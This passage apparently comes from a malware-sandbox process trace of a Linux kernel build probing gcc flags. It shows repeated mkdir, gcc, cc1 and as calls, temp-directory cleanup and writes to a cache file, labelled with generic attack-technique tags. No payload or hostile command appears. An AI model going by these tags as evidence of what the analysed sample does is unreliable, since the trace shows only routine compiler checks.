-mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-merge-all-constants\"; else echo \"\"; fi"3⤵PID:2040
-
/bin/mkdirmkdir -p /tmp/a/.tmp_20404⤵PID:2041
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -c -x c /dev/null -o /tmp/a/.tmp_2040/tmp4⤵PID:2042
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2040/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2043
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2040/tmp5⤵PID:2044
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2040/tmp5⤵PID:2044
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2040/tmp5⤵PID:2044
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2040/tmp5⤵PID:2044
-
/bin/rmrm -rf /tmp/a/.tmp_20404⤵PID:2045
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fno-merge-all-constants\";_else_echo_\"\";_fi := -fno-merge-all-constants' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
PID:2046 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fmerge-constants\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2047 -
/bin/mkdirmkdir -p /tmp/a/.tmp_20474⤵PID:2048
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -c -x c /dev/null -o /tmp/a/.tmp_2047/tmp4⤵PID:2049
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2047/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2050
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2047/tmp5⤵PID:2051
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2047/tmp5⤵PID:2051
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2047/tmp5⤵PID:2051
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2047/tmp5⤵PID:2051
-
/bin/rmrm -rf /tmp/a/.tmp_20474⤵PID:2052
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fmerge-constants\";_else_echo_\"\";_fi := -fmerge-constants' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2053 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-stack-check\"; else echo \"\"; fi"3⤵PID:2054
-
/bin/mkdirmkdir -p /tmp/a/.tmp_20544⤵PID:2055
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -c -x c /dev/null -o /tmp/a/.tmp_2054/tmp4⤵PID:2056
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2054/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2057
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2054/tmp5⤵PID:2058
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2054/tmp5⤵PID:2058
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2054/tmp5⤵PID:2058
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2054/tmp5⤵PID:2058
-
/bin/rmrm -rf /tmp/a/.tmp_20544⤵PID:2059
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fno-stack-check\";_else_echo_\"\";_fi := -fno-stack-check' >> /tmp/a/.cache.mk"3⤵PID:2060
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fconserve-stack\"; else echo \"\"; fi"3⤵PID:2061
-
/bin/mkdirmkdir -p /tmp/a/.tmp_20614⤵PID:2062
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -c -x c /dev/null -o /tmp/a/.tmp_2061/tmp4⤵PID:2063
-
